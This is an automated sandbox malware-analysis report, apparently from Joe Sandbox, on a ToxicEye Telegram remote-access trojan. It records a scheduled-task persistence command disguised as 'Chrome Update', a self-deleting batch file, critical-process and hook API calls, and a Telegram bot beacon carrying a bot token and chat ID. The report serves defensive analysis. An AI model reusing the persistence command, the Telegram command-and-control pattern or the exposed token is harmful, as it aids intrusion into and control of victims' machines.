                                                                                                  Jan 23, 2024 13:20:14.211009979 CET6358353192.168.2.61.1.1.1
                                                                                                  Jan 23, 2024 13:20:15.205822945 CET6358353192.168.2.61.1.1.1
                                                                                                  Jan 23, 2024 13:20:17.205501080 CET6358353192.168.2.61.1.1.1
                                                                                                  Jan 23, 2024 13:20:21.221441031 CET6358353192.168.2.61.1.1.1
                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                  Jan 23, 2024 13:19:48.570919991 CET192.168.2.6142.251.15.1394d5aEcho
                                                                                                  Jan 23, 2024 13:19:48.674257040 CET142.251.15.139192.168.2.6555aEcho Reply
                                                                                                  Jan 23, 2024 13:19:48.819416046 CET192.168.2.6149.154.167.2204d59Echo
                                                                                                  Jan 23, 2024 13:19:48.972187042 CET192.168.2.6149.154.167.2204d58Echo
                                                                                                  Jan 23, 2024 13:19:49.022226095 CET149.154.167.220192.168.2.65559Echo Reply
                                                                                                  Jan 23, 2024 13:19:49.022325993 CET192.168.2.6149.154.167.220fcfd(Protocol unreachable)Destination Unreachable
                                                                                                  Jan 23, 2024 13:19:49.175095081 CET149.154.167.220192.168.2.65558Echo Reply
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 23, 2024 13:19:48.438899040 CET192.168.2.61.1.1.10x9e83Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.699702978 CET192.168.2.61.1.1.10x6269Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:20:12.097091913 CET192.168.2.61.1.1.10xdf69Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:20:14.211009979 CET192.168.2.61.1.1.10xdf69Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:20:15.205822945 CET192.168.2.61.1.1.10xdf69Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:20:17.205501080 CET192.168.2.61.1.1.10xdf69Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:20:21.221441031 CET192.168.2.61.1.1.10xdf69Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET1.1.1.1192.168.2.60x9e83No error (0)google.com142.251.15.139A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET1.1.1.1192.168.2.60x9e83No error (0)google.com142.251.15.113A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET1.1.1.1192.168.2.60x9e83No error (0)google.com142.251.15.138A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET1.1.1.1192.168.2.60x9e83No error (0)google.com142.251.15.101A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET1.1.1.1192.168.2.60x9e83No error (0)google.com142.251.15.100A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET1.1.1.1192.168.2.60x9e83No error (0)google.com142.251.15.102A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 13:19:48.818393946 CET1.1.1.1192.168.2.60x6269No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                  • api.telegram.org
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649699149.154.167.2204435928C:\Users\ToxicEye\rat.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-01-23 12:19:49 UTC182OUTGET /bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
                                                                                                  Host: api.telegram.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-01-23 12:19:52 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Tue, 23 Jan 2024 12:19:52 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 58
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  2024-01-23 12:19:52 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                  Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:13:19:39
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                                                                                  Imagebase:0x1f365bf0000
                                                                                                  File size:114'176 bytes
                                                                                                  MD5 hash:B4354EE75E6D043AD4BA2C6D2DF30A6E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_ToxicEye, Description: Yara detected ToxicEye, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:13:19:39
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:13:19:42
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
                                                                                                  Imagebase:0x7ff645b90000
                                                                                                  File size:235'008 bytes
                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:13:19:42
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:13:19:43
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat
                                                                                                  Imagebase:0x7ff656f50000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:13:19:43
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:13:19:43
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:Tasklist /fi "PID eq 2960"
                                                                                                  Imagebase:0x7ff67eaf0000
                                                                                                  File size:106'496 bytes
                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:13:19:43
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:find ":"
                                                                                                  Imagebase:0x7ff790bc0000
                                                                                                  File size:17'920 bytes
                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:13:19:43
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\timeout.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:Timeout /T 1 /Nobreak
                                                                                                  Imagebase:0x7ff78c3d0000
                                                                                                  File size:32'768 bytes
                                                                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:13:19:44
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\ToxicEye\rat.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"rat.exe"
                                                                                                  Imagebase:0x23f1be80000
                                                                                                  File size:114'176 bytes
                                                                                                  MD5 hash:B4354EE75E6D043AD4BA2C6D2DF30A6E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ToxicEye, Description: Yara detected ToxicEye, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                  • Detection: 77%, Virustotal, Browse
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:13:19:44
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:13:19:44
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\ToxicEye\rat.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Users\ToxicEye\rat.exe
                                                                                                  Imagebase:0x1ef98090000
                                                                                                  File size:114'176 bytes
                                                                                                  MD5 hash:B4354EE75E6D043AD4BA2C6D2DF30A6E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:13:19:44
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:13:19:47
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
                                                                                                  Imagebase:0x7ff645b90000
                                                                                                  File size:235'008 bytes
                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:13:19:47
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:13:19:51
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976
                                                                                                  Imagebase:0x7ff6a3f70000
                                                                                                  File size:570'736 bytes
                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:16%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:6
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 2752 7ffd348a1c15 2753 7ffd348a1c2f GetConsoleWindow 2752->2753 2755 7ffd348a1cae 2753->2755 2748 7ffd348a88ed 2749 7ffd348a890f RtlSetProcessIsCritical 2748->2749 2751 7ffd348a89a0 2749->2751

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 63 7ffd348a6c06-7ffd348a6c13 64 7ffd348a6c15-7ffd348a6c1d 63->64 65 7ffd348a6c1e-7ffd348a6ce7 63->65 64->65 68 7ffd348a6ce9-7ffd348a6cf2 65->68 69 7ffd348a6d53 65->69 68->69 71 7ffd348a6cf4-7ffd348a6d00 68->71 70 7ffd348a6d55-7ffd348a6d7a 69->70 77 7ffd348a6de6 70->77 78 7ffd348a6d7c-7ffd348a6d85 70->78 72 7ffd348a6d39-7ffd348a6d51 71->72 73 7ffd348a6d02-7ffd348a6d14 71->73 72->70 75 7ffd348a6d16 73->75 76 7ffd348a6d18-7ffd348a6d2b 73->76 75->76 76->76 79 7ffd348a6d2d-7ffd348a6d35 76->79 81 7ffd348a6de8-7ffd348a6e90 77->81 78->77 80 7ffd348a6d87-7ffd348a6d93 78->80 79->72 82 7ffd348a6d95-7ffd348a6da7 80->82 83 7ffd348a6dcc-7ffd348a6de4 80->83 92 7ffd348a6efe 81->92 93 7ffd348a6e92-7ffd348a6e9c 81->93 84 7ffd348a6da9 82->84 85 7ffd348a6dab-7ffd348a6dbe 82->85 83->81 84->85 85->85 88 7ffd348a6dc0-7ffd348a6dc8 85->88 88->83 95 7ffd348a6f00-7ffd348a6f29 92->95 93->92 94 7ffd348a6e9e-7ffd348a6eab 93->94 96 7ffd348a6ead-7ffd348a6ebf 94->96 97 7ffd348a6ee4-7ffd348a6efc 94->97 101 7ffd348a6f2b-7ffd348a6f36 95->101 102 7ffd348a6f93 95->102 99 7ffd348a6ec1 96->99 100 7ffd348a6ec3-7ffd348a6ed6 96->100 97->95 99->100 100->100 103 7ffd348a6ed8-7ffd348a6ee0 100->103 101->102 104 7ffd348a6f38-7ffd348a6f46 101->104 105 7ffd348a6f95-7ffd348a7026 102->105 103->97 106 7ffd348a6f48-7ffd348a6f5a 104->106 107 7ffd348a6f7f-7ffd348a6f91 104->107 113 7ffd348a702c-7ffd348a703b 105->113 108 7ffd348a6f5c 106->108 109 7ffd348a6f5e-7ffd348a6f71 106->109 107->105 108->109 109->109 111 7ffd348a6f73-7ffd348a6f7b 109->111 111->107 114 7ffd348a703d 113->114 115 7ffd348a7043-7ffd348a70a8 call 7ffd348a70c4 113->115 114->115 122 7ffd348a70aa 115->122 123 7ffd348a70af-7ffd348a70c3 115->123 122->123
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6ab15f397f14dac65d1311a1eec564497c710666a3a4edf3a63e72260303f4ee
                                                                                                    • Instruction ID: 3a14441065fef3e83834535389d32a2ff190855b0d7502dc7e91bf757e766b51
                                                                                                    • Opcode Fuzzy Hash: 6ab15f397f14dac65d1311a1eec564497c710666a3a4edf3a63e72260303f4ee
                                                                                                    • Instruction Fuzzy Hash: 62F1B530A09A8D8FEBA8DF28C8557E937E1FF55310F14426EE84DC7295DF78A8458B81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 124 7ffd348a79b2-7ffd348a79bf 125 7ffd348a79ca-7ffd348a7a97 124->125 126 7ffd348a79c1-7ffd348a79c9 124->126 129 7ffd348a7a99-7ffd348a7aa2 125->129 130 7ffd348a7b03 125->130 126->125 129->130 131 7ffd348a7aa4-7ffd348a7ab0 129->131 132 7ffd348a7b05-7ffd348a7b2a 130->132 133 7ffd348a7ae9-7ffd348a7b01 131->133 134 7ffd348a7ab2-7ffd348a7ac4 131->134 139 7ffd348a7b96 132->139 140 7ffd348a7b2c-7ffd348a7b35 132->140 133->132 135 7ffd348a7ac6 134->135 136 7ffd348a7ac8-7ffd348a7adb 134->136 135->136 136->136 138 7ffd348a7add-7ffd348a7ae5 136->138 138->133 141 7ffd348a7b98-7ffd348a7bbd 139->141 140->139 142 7ffd348a7b37-7ffd348a7b43 140->142 149 7ffd348a7c2b 141->149 150 7ffd348a7bbf-7ffd348a7bc9 141->150 143 7ffd348a7b45-7ffd348a7b57 142->143 144 7ffd348a7b7c-7ffd348a7b94 142->144 145 7ffd348a7b59 143->145 146 7ffd348a7b5b-7ffd348a7b6e 143->146 144->141 145->146 146->146 148 7ffd348a7b70-7ffd348a7b78 146->148 148->144 151 7ffd348a7c2d-7ffd348a7c5b 149->151 150->149 152 7ffd348a7bcb-7ffd348a7bd8 150->152 158 7ffd348a7ccb 151->158 159 7ffd348a7c5d-7ffd348a7c68 151->159 153 7ffd348a7bda-7ffd348a7bec 152->153 154 7ffd348a7c11-7ffd348a7c29 152->154 156 7ffd348a7bee 153->156 157 7ffd348a7bf0-7ffd348a7c03 153->157 154->151 156->157 157->157 160 7ffd348a7c05-7ffd348a7c0d 157->160 162 7ffd348a7ccd-7ffd348a7da5 158->162 159->158 161 7ffd348a7c6a-7ffd348a7c78 159->161 160->154 163 7ffd348a7c7a-7ffd348a7c8c 161->163 164 7ffd348a7cb1-7ffd348a7cc9 161->164 172 7ffd348a7dab-7ffd348a7dba 162->172 165 7ffd348a7c8e 163->165 166 7ffd348a7c90-7ffd348a7ca3 163->166 164->162 165->166 166->166 168 7ffd348a7ca5-7ffd348a7cad 166->168 168->164 173 7ffd348a7dbc 172->173 174 7ffd348a7dc2-7ffd348a7e24 call 7ffd348a7e40 172->174 173->174 181 7ffd348a7e26 174->181 182 7ffd348a7e2b-7ffd348a7e3f 174->182 181->182
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3fd9489354098019d98d6eeee2bf219cd3027ea46766809cc49bb7dda1fdcd74
                                                                                                    • Instruction ID: 3dcfb81981692456b31c22407b39d83f16d616ffe9957920356271b4a0958cd8
                                                                                                    • Opcode Fuzzy Hash: 3fd9489354098019d98d6eeee2bf219cd3027ea46766809cc49bb7dda1fdcd74
                                                                                                    • Instruction Fuzzy Hash: 7BE1C430A08A4E8FEBA8DF28C8A57E977E1FF55310F04426ED80DC7291DB78E9459781
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2695349919-0
                                                                                                    • Opcode ID: 7a8f33881c509ccee178d214a312ba0c19ee697c4c1e0d5258ec4e95c5889984
                                                                                                    • Instruction ID: 2cbf35937280131c0c28d77cb68de7bf63b56556a52f70e0f6206051113c1459
                                                                                                    • Opcode Fuzzy Hash: 7a8f33881c509ccee178d214a312ba0c19ee697c4c1e0d5258ec4e95c5889984
                                                                                                    • Instruction Fuzzy Hash: 8B31E93190C7488FD729DBA8D8566E97BF0EF56321F04016FD049D3593DB656806CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7 7ffd348a1c15-7ffd348a1cac GetConsoleWindow 11 7ffd348a1cae 7->11 12 7ffd348a1cb4-7ffd348a1cd0 7->12 11->12
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2863861424-0
                                                                                                    • Opcode ID: 2be6815bd379b89b008f0cbbd9cdb8ca8dc311bd3c786e4b31cf739f04ffd668
                                                                                                    • Instruction ID: 327e083b75a78f541f630e18090b9b44774fa9cb093fcfe8e755e91353aa3e3e
                                                                                                    • Opcode Fuzzy Hash: 2be6815bd379b89b008f0cbbd9cdb8ca8dc311bd3c786e4b31cf739f04ffd668
                                                                                                    • Instruction Fuzzy Hash: 4B21837190CB4C8FDB69DB98D845AE9BBF0EF56320F00412FD049D3552DA746446CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:16.8%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:9
                                                                                                    Total number of Limit Nodes:0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HookWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2559412058-0
                                                                                                    • Opcode ID: 0b87281c42a1dd8e251321dec8437ef29270f08faff4bd20dfbbe7c3e87b3837
                                                                                                    • Instruction ID: efe8f245819b229fa14896a715bf28ba65a0f7e243e62639fca8401f809735b6
                                                                                                    • Opcode Fuzzy Hash: 0b87281c42a1dd8e251321dec8437ef29270f08faff4bd20dfbbe7c3e87b3837
                                                                                                    • Instruction Fuzzy Hash: BF31F531A0CA5C4FDB58EB5898566F9BBE1FB59311F00417ED009D3292DA75A8028BC1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 12 7ffd348896b1-7ffd3488975e RtlSetProcessIsCritical 16 7ffd34889766-7ffd34889788 12->16 17 7ffd34889760 12->17 17->16
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2695349919-0
                                                                                                    • Opcode ID: c3cfcd1c7a766e8af9340207a027a86ca7427808f9f93dff06393a2622ea77fc
                                                                                                    • Instruction ID: 1822505b30343133ec6a9067d8963c0428a0d3520190702ee446d587245555b1
                                                                                                    • Opcode Fuzzy Hash: c3cfcd1c7a766e8af9340207a027a86ca7427808f9f93dff06393a2622ea77fc
                                                                                                    • Instruction Fuzzy Hash: 9121D73191CB488FEB28EB98D85A6F97BE0EB59321F00013ED04AD3652DB647846CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 19 7ffd34881c15-7ffd34881cac GetConsoleWindow 23 7ffd34881cb4-7ffd34881cd0 19->23 24 7ffd34881cae 19->24 24->23
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
